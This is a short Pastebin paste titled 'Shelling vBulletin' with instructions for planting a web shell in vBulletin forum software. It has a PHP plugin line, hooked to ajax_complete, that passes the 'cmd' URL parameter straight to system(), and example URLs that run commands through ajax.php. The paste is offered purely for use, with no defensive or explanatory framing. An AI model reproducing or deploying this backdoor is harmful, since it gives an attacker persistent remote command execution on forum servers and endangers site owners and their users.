lehieuit

Shelling vBulletin [All Version ]

Apr 21st, 2012
263
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.30 KB | None | 0 0
  1. Add a plugin. Make it for Ajax_complete and in the code area add :
  2.  
  3. Code:
  4.  
  5. if(isset($_GET['cmd'])){echo "<h1>cmd</h1><pre>"; system($_GET['cmd']);exit;}
  6.  
  7. Activate the mod.
  8.  
  9. Code:
  10.  
  11. www.site.com/forumlocation/ajax.php?cmd=command
  12.  
  13. Exemple :
  14.  
  15. Code:
  16.  
  17. www.site.com/forumlocation/ajax.php?cmd=ls
Advertisement
Add Comment
Please, Sign In to add comment